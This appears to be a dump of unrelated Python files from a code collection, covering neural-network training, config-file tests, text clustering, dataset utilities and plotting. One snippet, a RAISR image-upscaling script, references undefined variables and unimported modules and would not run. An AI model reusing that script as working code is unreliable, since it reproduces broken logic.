b2.add(tf.keras.layers.MaxPool2D(pool_size=3, strides=2, padding='same'))
b3 = tf.keras.models.Sequential()
b3.add(Inception(64, (96, 128), (16, 32), 32))
b3.add(Inception(128, (128, 192), (32, 96), 64))
b3.add(tf.keras.layers.MaxPool2D(pool_size=3, strides=2, padding='same'))
b4 = tf.keras.models.Sequential()
b4.add(Inception(192, (96, 208), (16, 48), 64))
b4.add(Inception(160, (112, 224), (24, 64), 64))
b4.add(Inception(128, (128, 256), (24, 64), 64))
b4.add(Inception(112, (144, 288), (32, 64), 64))
b4.add(Inception(256, (160, 320), (32, 128), 128))
b4.add(tf.keras.layers.MaxPool2D(pool_size=3, strides=2, padding='same'))
b5 = tf.keras.models.Sequential()
b5.add(Inception(256, (160, 320), (32, 128), 128))
b5.add(Inception(384, (192, 384), (48, 128), 128))
b5.add(tf.keras.layers.GlobalAvgPool2D())
net = tf.keras.models.Sequential([b1, b2, b3, b4, b5, tf.keras.layers.Dense(10,activation='softmax')])
return net
|
11557505
|
import json
import os
import yaml
import tempfile
from unittest import TestCase
from conman.conman_file import ConManFile
def _make_config_file(file_type, content):
# create temp filename
f = tempfile.NamedTemporaryFile(suffix=file_type, delete=False)
# write content
f.write(content.encode('utf-8'))
# return filename
return f.name
def _make_ini_file(valid, extension=None):
valid_text = '[ini_conf]\nkey = value\n'
invalid_text = 'vdgdfhf bt'
content = valid_text if valid else invalid_text
file_type = extension if extension else '.ini'
return _make_config_file(file_type, content)
def _make_json_file(valid, extension=None):
valid_text = json.dumps(dict(json_conf=dict(key='value')))
invalid_text = 'vdgdfhf bt'
content = valid_text if valid else invalid_text
file_type = extension if extension else '.json'
return _make_config_file(file_type, content)
def _make_yaml_file(valid, extension=None):
valid_text = yaml.dump(dict(
root_key='root_value',
yaml_conf=dict(key='value')))
invalid_text = 'vdgdfhf bt'
content = valid_text if valid else invalid_text
file_type = extension if extension else '.yaml'
return _make_config_file(file_type, content)
class ConmanFileTest(TestCase):
@classmethod
def setUpClass(cls):
cls._good_files = {}
cls._good_files['ini'] = _make_ini_file(True)
cls._good_files['json'] = _make_json_file(True)
cls._good_files['yaml'] = _make_yaml_file(True, extension='.txt')
cls._bad_files = {}
cls._bad_files['ini'] = _make_ini_file(False)
cls._bad_files['json'] = _make_json_file(False)
cls._bad_files['yaml'] = _make_yaml_file(False)
cls._all_files = list(cls._good_files.values()) + \
list(cls._bad_files.values())
@classmethod
def tearDownClass(cls):
for f in cls._all_files:
os.remove(f)
def setUp(self):
self.conman = ConManFile()
def tearDown(self):
pass
def test_guess_file_type(self):
f = self.conman._guess_file_type
self.assertEqual('json', f('x.json'))
self.assertEqual('yaml', f('x.yml'))
self.assertEqual('yaml', f('x.yaml'))
self.assertEqual('ini', f('x.ini'))
self.assertIsNone(f('x.no_such_ext'))
def test_init_no_files(self):
self.assertDictEqual({}, self.conman._conf)
def test_init_some_good_files(self):
c = ConManFile(self._good_files.values())
expected = dict(root_key='root_value',
json_conf=dict(key='value'),
yaml_conf=dict(key='value'),
ini_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_init_some_bad_files(self):
some_bad_files = self._all_files
self.assertRaises(Exception, ConManFile, some_bad_files)
def test_add_config_file_simple_with_file_type(self):
c = self.conman
c.add_config_file(self._good_files['ini'], file_type='ini')
expected = dict(ini_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_add_config_file_simple_guess_file_type(self):
c = self.conman
c.add_config_file(self._good_files['ini'])
expected = dict(ini_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_add_config_file_simple_wrong_file_type(self):
c = self.conman
c.add_config_file(self._good_files['ini'], file_type='json')
expected = dict(ini_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_add_config_file_simple_unknown_wrong_file_type(self):
c = self.conman
c.add_config_file(self._good_files['ini'], file_type='asdf')
expected = dict(ini_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_add_config_file_from_env_var(self):
os.environ['good_config'] = self._good_files['yaml']
c = ConManFile()
c.add_config_file(env_variable='good_config')
expected = dict(root_key='root_value',
yaml_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_add_config_file_with_base_dir(self):
filename = self._good_files['json']
base_dir, base_name = os.path.split(filename)
c = ConManFile()
c.add_config_file(filename=base_name, base_dir=base_dir)
expected = dict(json_conf=dict(key='value'))
self.assertDictEqual(expected, c._conf)
def test_dictionary_access(self):
c = ConManFile(self._good_files.values())
self.assertEqual('root_value', c['root_key'])
|
11557517
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='TxtOrg',
version='1.0.0',
author='<NAME>, <NAME>, <NAME>',
author_email='<EMAIL>',
packages=['textorganizer'],
scripts=['bin/txtorg'],
license='LICENSE.txt',
description='Tool to make organizing data for textual analysis easy and scalable',
install_requires=['whoosh','chardet', 'snownlp'],
)
|
11557521
|
import time
import torch.autograd
import torch.nn as nn
from core.label_smooth import LabelSmoothCrossEntropyLoss
from core.utils import *
from core.warmup_scheduler import GradualWarmupScheduler
class View(nn.Module):
"""
Reshape data from 4 dimension to 2 dimension
"""
def forward(self, x):
assert x.dim() == 2 or x.dim() == 4, "invalid dimension of input {:d}".format(
x.dim()
)
if x.dim() == 4:
out = x.view(x.size(0), -1)
else:
out = x
return out
class Trainer(object):
"""
Trainer
"""
def __init__(
self,
model,
device,
train_loader,
val_loader,
settings,
logger,
tensorboard_logger,
optimizer_state=None,
lr_scheduler_state=None,
run_count=0,
**kwargs
):
self.settings = settings
self.device = device
self.model = model
self.model = self.model.to(self.device)
self.train_loader = train_loader
self.val_loader = val_loader
self.logger = logger
self.tensorboard_logger = tensorboard_logger
self.run_count = run_count
if self.settings.label_smooth > 0:
self.criterion = LabelSmoothCrossEntropyLoss(
num_classes=self.settings.n_classes
)
else:
self.criterion = nn.CrossEntropyLoss()
self.lr = self.settings.lr
params = self.model.parameters()
if len(self.settings.no_decay_keys) != 0:
params = []
for name, param in self.model.named_parameters():
flag = False
for key in self.settings.no_decay_keys:
if key in name:
flag = True
break
if flag:
weight_decay = 0
else:
weight_decay = self.settings.weight_decay
params.append(
{
"params": param,
"lr": self.settings.lr,
"weight_decay": weight_decay,
}
)
if "SGD" in self.settings.opt_type:
self.optimizer = torch.optim.SGD(
params=params,
lr=self.settings.lr,
momentum=self.settings.momentum,
weight_decay=self.settings.weight_decay,
nesterov=True,
)
elif "RMSProp" in self.settings.opt_type:
self.optimizer = torch.optim.RMSprop(
params=params,
lr=self.settings.lr,
alpha=self.settings.alpha,
eps=self.settings.eps,
weight_decay=self.settings.weight_decay,
momentum=self.settings.momentum,
)
elif "AdamW" in self.settings.opt_type:
self.optimizer = torch.optim.AdamW(
params=params,
lr=self.settings.lr,
weight_decay=self.settings.weight_decay,
)
elif "Adam" in self.settings.opt_type:
self.optimizer = torch.optim.Adam(
params=params,
lr=self.settings.lr,
weight_decay=self.settings.weight_decay,
)
self.logger.info(self.optimizer)
self.logger.info(self.criterion)
if optimizer_state is not None:
self.logger.info("Load optimizer state!")
self.optimizer.load_state_dict(optimizer_state)
if "cosine_warmup" in self.settings.lr_scheduler_type:
self.logger.info("Cosine Annealing Warmup LR!")
self.after_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
self.optimizer, self.settings.n_epochs - self.settings.warmup_n_epochs
)
self.scheduler = GradualWarmupScheduler(
self.optimizer, 1, self.settings.warmup_n_epochs, self.after_scheduler
)
elif "cosine" in self.settings.lr_scheduler_type:
self.logger.info("Cosine Annealing LR!")
self.scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
self.optimizer, self.settings.n_epochs
)
else:
self.logger.info("MultiStep LR!")
self.scheduler = torch.optim.lr_scheduler.MultiStepLR(
self.optimizer, milestones=self.settings.step, gamma=0.1
)
if lr_scheduler_state is not None:
self.logger.info("Load lr state")
last_epoch = lr_scheduler_state["last_epoch"]
self.logger.info(self.scheduler.last_epoch)
while self.scheduler.last_epoch < last_epoch:
self.scheduler.step()
model_without_ddp = self.model
if self.settings.distributed:
self.model = torch.nn.parallel.DistributedDataParallel(
model, device_ids=[self.settings.gpu], find_unused_parameters=True
)
self.model_without_ddp = self.model.module
def backward(self, loss):
"""
backward propagation
"""
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
def get_lr(self):
for param_group in self.optimizer.param_groups:
self.lr = param_group["lr"]
break
def train(self, epoch):
"""
Train one epoch
:param epoch: index of epoch
"""
metric_logger = MetricLogger(logger=self.logger, delimiter=" ")
metric_logger.add_meter("lr", SmoothedValue(window_size=1, fmt="{value}"))
metric_logger.add_meter("img/s", SmoothedValue(window_size=10, fmt="{value}"))
self.model.train()
header = "Epoch: [{}]".format(epoch)
for image, target in metric_logger.log_every(
self.train_loader, self.settings.print_frequency, header
):
start_time = time.time()
image, target = image.to(self.device), target.to(self.device)
# forward
output = self.model(image)
loss = self.criterion(output, target)
# backward
self.backward(loss)
acc1, acc5 = accuracy(output, target, topk=(1, 5))
batch_size = image.shape[0]
metric_logger.update(
loss=loss.item(), lr=self.optimizer.param_groups[0]["lr"]
)
metric_logger.meters["acc1"].update(acc1.item(), n=batch_size)
metric_logger.meters["acc5"].update(acc5.item(), n=batch_size)
metric_logger.meters["img/s"].update(
batch_size / (time.time() - start_time)
)
# gather the stats from all processes
metric_logger.synchronize_between_processes()
self.scheduler.step()
self.get_lr()
self.logger.info("Change Learning rate: {}".format(self.lr))
train_error = 100 - metric_logger.acc1.global_avg
train_loss = metric_logger.loss.global_avg
train5_error = 100 - metric_logger.acc5.global_avg
if self.tensorboard_logger is not None:
self.tensorboard_logger.add_scalar(
"train_top1_error", train_error, self.run_count
)
self.tensorboard_logger.add_scalar(
"train_top5_error", train5_error, self.run_count
)
self.tensorboard_logger.add_scalar("train_loss", train_loss, self.run_count)
self.tensorboard_logger.add_scalar("lr", self.lr, self.run_count)
self.logger.info(
"|===>Training Error: {:.4f} Loss: {:.4f}, Top5 Error: {:.4f}".format(
train_error, train_loss, train5_error
)
)
return train_error, train_loss, train5_error
def val(self, epoch):
"""
Validation
:param epoch: index of epoch
"""
self.model.eval()
metric_logger = MetricLogger(logger=self.logger, delimiter=" ")
header = "Test:"
with torch.no_grad():
for image, target in metric_logger.log_every(
self.val_loader, self.settings.print_frequency, header
):
image = image.to(self.device, non_blocking=True)
target = target.to(self.device, non_blocking=True)
# forward
output = self.model(image)
loss = self.criterion(output, target)
acc1, acc5 = accuracy(output, target, topk=(1, 5))
batch_size = image.shape[0]
metric_logger.update(loss=loss.item())
metric_logger.meters["acc1"].update(acc1.item(), n=batch_size)
metric_logger.meters["acc5"].update(acc5.item(), n=batch_size)
# gather the stats from all processes
metric_logger.synchronize_between_processes()
val_error = 100 - metric_logger.acc1.global_avg
val_loss = metric_logger.loss.global_avg
val5_error = 100 - metric_logger.acc5.global_avg
if self.tensorboard_logger is not None:
self.tensorboard_logger.add_scalar(
"val_top1_error", val_error, self.run_count
)
self.tensorboard_logger.add_scalar(
"val_top5_error", val5_error, self.run_count
)
self.tensorboard_logger.add_scalar("val_loss", val_loss, self.run_count)
self.run_count += 1
self.logger.info(
"|===>Testing Error: {:.4f} Loss: {:.4f}, Top5 Error: {:.4f}".format(
val_error, val_loss, val5_error
)
)
return val_error, val_loss, val5_error
def val_without_tb(self, epoch):
"""
Validation
:param epoch: index of epoch
"""
self.model.eval()
metric_logger = MetricLogger(logger=self.logger, delimiter=" ")
header = "Test:"
with torch.no_grad():
for image, target in metric_logger.log_every(
self.val_loader, self.settings.print_frequency, header
):
image = image.to(self.device, non_blocking=True)
target = target.to(self.device, non_blocking=True)
# forward
output = self.model(image)
loss = self.criterion(output, target)
acc1, acc5 = accuracy(output, target, topk=(1, 5))
batch_size = image.shape[0]
metric_logger.update(loss=loss.item())
metric_logger.meters["acc1"].update(acc1.item(), n=batch_size)
metric_logger.meters["acc5"].update(acc5.item(), n=batch_size)
# gather the stats from all processes
metric_logger.synchronize_between_processes()
val_error = 100 - metric_logger.acc1.global_avg
val_loss = metric_logger.loss.global_avg
val5_error = 100 - metric_logger.acc5.global_avg
self.logger.info(
"|===>Testing Error: {:.4f} Loss: {:.4f}, Top5 Error: {:.4f}".format(
val_error, val_loss, val5_error
)
)
return val_error, val_loss, val5_error
|
11557565
|
import numpy as np
from utils import is_image_file, mod_crop
from hashTable import hashTable
Qangle = 24
Qstrenth = 3
Qcoherence = 3
datasets = './datasets/General100/'
rate = 3
images_path = [os.path.join(datasets, x) for x in os.listdir(datasets) if is_image_file(x)]
print("Load dataset ", len(images_path))
H = np.load("filters.npy")
for image_path in tqdm(images_path):
print("Test %s" % image_path)
im = misc.imread(image_path, mode='YCbCr')
lr = mod_crop(im, rate)
y, cb, cr = lr.split()
h, w = y.shape
sr = np.zeros((h*rate, w*rate))
for xP in range(5,LR.shape[0]-6):
for yP in range(5,LR.shape[1]-6):
patch = LR[xP-5:xP+6,yP-5:yP+6]
[angle,strenth,coherence] = hashTable(patch,Qangle,Qstrenth,Qcoherence)
j = angle*9+strenth*3+coherence
A = patch.reshape(1,-1)
t = xP%2*2+yP%2
hh = np.matrix(h[j,t])
LRDirect[xP][yP] = hh*A.T
print("Test is off")
# Show the result
mat = cv2.imread("../train/a.jpg")
mat = cv2.cvtColor(mat, cv2.COLOR_BGR2YCrCb)
fig, axes = plt.subplots(ncols=2,figsize=(15,10))
axes[0].imshow(cv2.cvtColor(mat, cv2.COLOR_YCrCb2RGB))
axes[0].set_title('ORIGIN')
LR = cv2.resize(mat,(0,0),fx=2,fy=2)
LRDirectImage = LR
LRDirectImage[:,:,2] = LRDirect
axes[1].imshow(cv2.cvtColor(LRDirectImage, cv2.COLOR_YCrCb2RGB))
axes[1].set_title('RAISR')
fig.savefig("../fig.png")
|
11557672
|
from tensorflow_functions import cosine_knn
import collections
import numpy as np
import logging
from embedding import load_embedding
import operator
from sklearn.cluster import KMeans
from utils import length_normalize, normalize_questions, normalize_vector, calculate_cosine_simil, perf_measure
import sklearn.metrics
import argparse
import os
import datetime
class Question_Manager():
questions = []
questions_normalized = []
questions_vectors = []
keywords = collections.defaultdict()
embedding = None
def __init__(self, embedding_path='/home/iker/Documents/QuestionCluster/TechEmbeddings/embeddings_lower.vec'):
self.questions = []
self.questions_normalized = []
self.questions_vectors = []
self.keywords = collections.defaultdict()
self.embedding = load_embedding(embedding_path)
def get_keywords(self):
return sorted(self.keywords.items(), key=operator.itemgetter(1), reverse=True)
def question_to_vector(self, question, prefix=False):
sentence = np.zeros([self.embedding.dims])
num_words = 0
for word in question:
try:
if prefix:
sentence += self.embedding.word_to_vector(prefix+'/'+word)
else:
sentence += self.embedding.word_to_vector(word)
num_words += 1
except KeyError as r:
continue
if num_words > 0:
sentence = sentence / num_words
else:
logging.warning('Could not calculate the sentence embedding fot the sentence ' + str(question))
return sentence
def update_keyword_for_sentence(self, question):
for word in question:
try:
self.keywords[word] += 1
except KeyError as er:
self.keywords[word] = 1
def print_question(self, question, path='questions.txt'):
with open(path, 'a') as file:
print(str(question), file=file)
def add_question(self, question):
normalized_question = normalize_questions(question)
question_vector = self.question_to_vector(normalized_question)
if len(normalized_question) > 0 and question_vector is not None:
self.questions.append(question)
self.questions_normalized.append(normalized_question)
self.questions_vectors.append(question_vector)
self.update_keyword_for_sentence(normalized_question)
self.print_question(question)
def load_form_file(self, path):
with open(path, 'r') as file:
for line in file:
self.add_question(line)
def clustering(self, n_clusters=8):
kmeans = KMeans(n_clusters=n_clusters, random_state=0).fit(np.array(self.questions_vectors))
cluster_centers = kmeans.cluster_centers_
labels = kmeans.labels_
questions_cluster = [[] for x in range(n_clusters)]
for i_label, label in enumerate(kmeans.predict(np.array(self.questions_vectors))):
questions_cluster[label].append(self.questions[i_label])
return questions_cluster
def k_nearest(self, sentence, k=1):
vectors_norm = length_normalize(np.array(self.questions_vectors))
result = cosine_knn([self.question_to_vector(normalize_questions(sentence))], vectors_norm, k=k)
for s in result[0]:
print(self.questions[s])
def evaluate_similarity(self, question_file, threshold = 0.8, prefix =False):
question1 = []
question2 = []
gold_scores = []
with open(question_file) as file:
for line in file:
line = line.rstrip()
q1, q2, gold = line.split('\t')
question1.append(q1)
question2.append(q2)
gold_scores.append(int(gold))
question_vectors_1 = [self.question_to_vector(normalize_questions(x),prefix) for x in question1]
question_vectors_2 = [self.question_to_vector(normalize_questions(x), prefix) for x in question2]
scores = []
for i in range(len(question_vectors_1)):
if i % 10 == 0:
string = "<" + str(datetime.datetime.now()) + "> " + 'Evaluating Question Pairs: ' + str(
int(100 * ((i+10) / len(question_vectors_1)))) + '%'
print(string, end="\r")
score = calculate_cosine_simil(question_vectors_1[i], question_vectors_2[i])
if score > threshold:
scores.append(1)
else:
scores.append(0)
print()
result = sklearn.metrics.log_loss(gold_scores, scores)
TP, FP, TN, FN = perf_measure(gold_scores, scores)
acc = np.sum(np.array(gold_scores) == np.array(scores))/len(gold_scores)
print('Log Loss: ' + str(result))
print('Acc: ' + str(acc))
print('TP: ' + str(TP) + '\tFP: ' + str(FP) + '\tTN: ' + str(TN) + '\tFN: ' + str(FN))
print(scores)
print(gold_scores)
return result, acc, TP, FP, TN, FN
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-q', '--question_file', required=True, type=str)
parser.add_argument('-e', '--embedding', required=True, type=str)
#parser.add_argument('-t', '--threshold', default='0.8', type=float)
parser.add_argument('-p', '--prefix', type=str, default=None)
args = parser.parse_args()
qm = Question_Manager(embedding_path=args.embedding)
for threshold in [0.5, 0.6, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95]:
print('===> Threshold: ' + str(threshold))
result = qm.evaluate_similarity(args.question_file, threshold, args.prefix)
if not os.path.exists('Results'):
os.makedirs('Results')
with open('Results/baseline.csv', 'a+') as file:
txtResults = str(args.embedding) + '\t' + str(threshold) + '\t' + str(result[0]) + '\t' + str(result[1]) + '\t' + \
str(result[2]) + '\t' + str(result[3]) + '\t' + str(result[4]) + '\t' + str(result[5])
print('%s' % (str(txtResults)), file=file)
|
11557683
|
import os
from time import sleep
from multiprocessing import Process
def test(i):
print(f"[{i}]PID:{os.getpid()},PPID:{os.getppid()}")
sleep(1)
def main():
p_list = [Process(target=test, args=(i, )) for i in range(10)]
for p in p_list:
p.start()
for p in p_list:
p.join()
print(f"[子进程{p.pid}]正常退出")
if __name__ == '__main__':
main()
|
11557727
|
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.surface_construction_elements import WindowMaterialScreenEquivalentLayer
log = logging.getLogger(__name__)
class TestWindowMaterialScreenEquivalentLayer(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_windowmaterialscreenequivalentlayer(self):
pyidf.validation_level = ValidationLevel.error
obj = WindowMaterialScreenEquivalentLayer()
# alpha
var_name = "Name"
obj.name = var_name
# real
var_screen_beambeam_solar_transmittance = 0.49995
obj.screen_beambeam_solar_transmittance = var_screen_beambeam_solar_transmittance
# real
var_screen_beamdiffuse_solar_transmittance = 0.49995
obj.screen_beamdiffuse_solar_transmittance = var_screen_beamdiffuse_solar_transmittance
# real
var_screen_beamdiffuse_solar_reflectance = 0.49995
obj.screen_beamdiffuse_solar_reflectance = var_screen_beamdiffuse_solar_reflectance
# real
var_screen_beambeam_visible_transmittance = 0.49995
obj.screen_beambeam_visible_transmittance = var_screen_beambeam_visible_transmittance
# real
var_screen_beamdiffuse_visible_transmittance = 0.49995
obj.screen_beamdiffuse_visible_transmittance = var_screen_beamdiffuse_visible_transmittance
# real
var_screen_beamdiffuse_visible_reflectance = 0.49995
obj.screen_beamdiffuse_visible_reflectance = var_screen_beamdiffuse_visible_reflectance
# real
var_screen_infrared_transmittance = 0.49995
obj.screen_infrared_transmittance = var_screen_infrared_transmittance
# real
var_screen_infrared_emissivity = 0.5
obj.screen_infrared_emissivity = var_screen_infrared_emissivity
# real
var_screen_wire_spacing = 0.0001
obj.screen_wire_spacing = var_screen_wire_spacing
# real
var_screen_wire_diameter = 0.0001
obj.screen_wire_diameter = var_screen_wire_diameter
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.windowmaterialscreenequivalentlayers[0].name, var_name)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beambeam_solar_transmittance, var_screen_beambeam_solar_transmittance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beamdiffuse_solar_transmittance, var_screen_beamdiffuse_solar_transmittance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beamdiffuse_solar_reflectance, var_screen_beamdiffuse_solar_reflectance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beambeam_visible_transmittance, var_screen_beambeam_visible_transmittance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beamdiffuse_visible_transmittance, var_screen_beamdiffuse_visible_transmittance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beamdiffuse_visible_reflectance, var_screen_beamdiffuse_visible_reflectance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_infrared_transmittance, var_screen_infrared_transmittance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_infrared_emissivity, var_screen_infrared_emissivity)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_wire_spacing, var_screen_wire_spacing)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_wire_diameter, var_screen_wire_diameter)
|
11557773
|
import abc
class BaseWrapper(metaclass=abc.ABCMeta):
def __init__(self, env=None):
self.env = env
def set_env(self, env):
self.env = env
@abc.abstractmethod
def step(self, action):
raise NotImplementedError
@abc.abstractmethod
def reset(self):
'''
reset返回的态势与step的情况一致,要求reset时一定返回重置时环境的状态情况
'''
raise NotImplementedError
def seed(self):
pass
def close(self):
pass
@abc.abstractmethod
def get_actionspace(self, character=None):
raise NotImplementedError
@abc.abstractmethod
def get_observationspace(self, character=None):
raise NotImplementedError
|
11557824
|
import os
from typing import Mapping, Optional, TextIO, Tuple, Union
from .context import Context
from .output import Renderer, render
def determine_format(filename: Optional[str], choices: Mapping[str, Renderer], default: str) -> str:
if filename:
ext = os.path.splitext(filename)[1].lstrip('.').lower()
if ext in choices:
return ext
return default
class Template:
def __init__(self, template, filename: Optional[str] = None) -> None:
if not isinstance(template, list):
raise TypeError(
f'`template` must be a list of objects; {template!r} is not. Are you maybe looking for Template.parse()?'
)
self.template, self.defaults = extract_defaults(template, filename)
self.filename = filename
def enrich(self, context: Union[dict, Context]):
context = Context(self.defaults, context, __file__=self.filename)
return context.enrich(self.template)
def render(self, context: Union[dict, Context], format: str = 'yaml') -> str:
enriched = self.enrich(context)
return render(enriched, format)
@classmethod
def parse(
cls,
data: Union[TextIO, str],
format: Optional[str] = None,
filename: Optional[str] = None,
) -> 'Template':
from .input import PARSERS, parse
if filename is None and hasattr(data, 'name') and data.name: # type: ignore
filename = data.name # type: ignore
if format is None:
format = determine_format(filename, PARSERS, 'yaml')
return cls(template=parse(data, format=format), filename=filename)
def extract_defaults(template, filename: Optional[str]) -> Tuple[list, dict]:
from .tags import Defaults, Include
defaults = {}
for doc in template:
if isinstance(doc, Defaults):
defaults.update(doc.data)
elif isinstance(doc, Include):
temp_context = Context()
temp_context.update(defaults, __file__=filename)
defaults.update(doc.get_template(temp_context).defaults)
template = [doc for doc in template if not isinstance(doc, Defaults)]
return template, defaults
|
11557860
|
from collections import Counter
import glob
import os
from tqdm import tqdm
import torch
import pandas as pd
import torch.utils.data as tud
def load_clean_aol(folder, use_tqdm=True):
ct_names = glob.glob(os.path.join(folder, 'clean-*.txt'))
dfs = []
if use_tqdm: ct_names = tqdm(ct_names)
for ct_name in ct_names:
idx = int(ct_name.split('-')[-1].split('.txt')[0])
df = pd.read_csv(ct_name, sep='\t', quoting=3, error_bad_lines=False, keep_default_na=False).astype(str)
dfs.append((idx, df))
dfs = [x[1] for x in sorted(dfs, key=lambda x: x[0])]
return dfs
class SingleSentenceDataset(tud.Dataset):
def __init__(self, sentences):
super().__init__()
self.sentences = sentences
def __getitem__(self, idx):
return idx, self.sentences[idx]
def __len__(self):
return len(self.sentences)
@classmethod
def splits(cls, folder, train_file='train.tsv', dev_file='dev.tsv',
test_file='test.tsv', column='sentence',
filter_label=None, label_column='label', **kwargs):
dfs = [os.path.join(folder, x) for x in (train_file, dev_file, test_file)]
dfs = [pd.read_csv(df, sep='\t', quoting=3, error_bad_lines=True, keep_default_na=False).astype(str) for df in dfs]
if filter_label is not None:
for idx in (0, 1): dfs[idx] = dfs[idx][dfs[idx][label_column] == filter_label]
sentences_lst = [list(df[column]) for df in dfs]
return [cls(x) for x in sentences_lst]
@classmethod
def pair_splits(cls, folder, train_file='train.tsv', dev_file='dev.tsv',
test_file='test.tsv', column1='question1', column2='question2',
filter_label='0', label_column='is_duplicate', **kwargs):
dfs = [os.path.join(folder, x) for x in (train_file, dev_file, test_file)]
dfs = [pd.read_csv(df, sep='\t', quoting=3, error_bad_lines=True, keep_default_na=False).astype(str) for df in dfs]
if filter_label is not None:
for idx in (0, 1): dfs[idx] = dfs[idx][dfs[idx][label_column] == filter_label]
sentences_lst = [[f' \t '.join((x, y)) for x, y in zip(df[column1], df[column2])] for df in dfs]
return list(map(cls, sentences_lst))
class Dictionary(object):
def __init__(self, eos=True, pad=True, sos=True):
self.word2idx = {}
self.idx2word = []
self.counter = Counter()
self.total = 0
if eos: self.add_word('<eos>')
if pad: self.add_word('<pad>')
if sos: self.add_word('<sos>')
def add_word(self, word):
if word not in self.word2idx:
self.idx2word.append(word)
self.word2idx[word] = len(self.idx2word) - 1
token_id = self.word2idx[word]
self.counter[token_id] += 1
self.total += 1
return self.word2idx[word]
def __len__(self):
return len(self.idx2word)
def sent2idx(self, sentences, **kwargs):
tokens_lst, tokens_mask = tokenize_batch(sentences, **kwargs)
tokens_lst = [[self.word2idx[x] for x in sent] for sent in tokens_lst]
return tokens_lst, tokens_mask
def tokenize_batch(sentences,
tokenize_fn=list,
eos='<eos>',
pad='<pad>',
sos=None,
max_len=100,
pad_to_max=False):
eos_append = [eos] if eos else []
sos_prepend = [sos] if sos else []
tokens_lst = [sos_prepend + tokenize_fn(x) + eos_append for x in sentences]
tokens_mask = [[1] * len(x) for x in tokens_lst]
max_len = max_len if pad_to_max else min(max(map(len, tokens_lst)), max_len)
tokens_lst = [x[:max_len] for x in tokens_lst]
tokens_mask = [x[:max_len] for x in tokens_mask]
tokens_lst = [x + ['<pad>'] * (max_len - len(x)) for x in tokens_lst]
tokens_mask = [x + [0] * (max_len - len(x)) for x in tokens_mask]
return tokens_lst, tokens_mask
def tokens_reduce(loss, tokens_lst):
mask = []
for tokens in tokens_lst:
mask.append([int(x != '<pad>') for x in tokens])
mask = torch.Tensor(mask)
loss = loss * mask
return loss.sum() / mask.sum()
|
11557902
|
import pandas as pd
import plotly.express as px
def iplot_bar_polar(self, theta, color, r='auto', template='xgridoff',
color_continuous_scale='auto', **kwds):
"""
It uses plotly.express.bar_polar.
In a polar bar plot, each row of 'color' is represented as a wedge mark in polar coordinates.
Parameters
----------
theta: str
wf.data colum with the directions in degrees (0 - 360)
color: str
wf.data colum with the data to plot with colors
r: str
wf.data column with the data to use as a radium.
If r = 'auto', r is the counts of 'theta' en each direction.
template: str
Plotly express style templates.
Options:
'ggplot2'
'seaborn'
'simple_white'
'plotly'
'plotly_white'
'plotly_dark'
'presentation'
'xgridoff'
'ygridoff'
'gridon'
'none'
color_continuous_scale: plotly.express.sequential
View https://plotly.com/python/colorscales/.
If color_continuous_scale = 'auto', color_continuous_scale = px.colors.sequential.Rainbow
**kwds: plotly.express.bar_polar arguments
Returns
-------
fig: plotly.graph_objects.Figure
"""
if color_continuous_scale == 'auto':
color_continuous_scale = px.colors.sequential.Rainbow
df = self.data.copy()
# Create directions
df['direction'] = 'N'
df.loc[df[theta].between(11.25, 33.75) , 'direction'] = 'NNE'
df.loc[df[theta].between(33.75, 56.25) , 'direction'] = 'NE'
df.loc[df[theta].between(56.25, 78.75) , 'direction'] = 'ENE'
df.loc[df[theta].between(78.75, 101.25) , 'direction'] = 'E'
df.loc[df[theta].between(101.25, 123.75) , 'direction'] = 'ESE'
df.loc[df[theta].between(123.75, 146.25) , 'direction'] = 'SE'
df.loc[df[theta].between(146.25, 168.75) , 'direction'] = 'SSE'
df.loc[df[theta].between(168.75, 191.25) , 'direction'] = 'S'
df.loc[df[theta].between(191.25, 213.75) , 'direction'] = 'SSW'
df.loc[df[theta].between(213.75, 236.25) , 'direction'] = 'SW'
df.loc[df[theta].between(236.25, 258.75) , 'direction'] = 'WSW'
df.loc[df[theta].between(258.75, 281.25) , 'direction'] = 'W'
df.loc[df[theta].between(281.25, 303.75) , 'direction'] = 'WNW'
df.loc[df[theta].between(303.75, 326.25) , 'direction'] = 'NW'
df.loc[df[theta].between(326.25, 348.75) , 'direction'] = 'NNW'
new_index = ['N', 'NNE', 'NE', 'ENE', 'E', 'ESE', 'SE', 'SSE', 'S',
'SSW', 'SW', 'WSW', 'W', 'WNW', 'NW', 'NNW']
# Create serie of counts for directions
s_dir = df['direction'].value_counts()
s_dir.rename('frequency', inplace=True)
# Create mean of directions
df_mean = df.groupby(['direction']).mean()
df_work = pd.merge(s_dir, df_mean[color], right_index=True, left_index=True)
if r != 'auto':
df_work = pd.merge(df_work, df_mean[r], right_index=True,
left_index=True)
df_work = df_work.reindex(new_index)
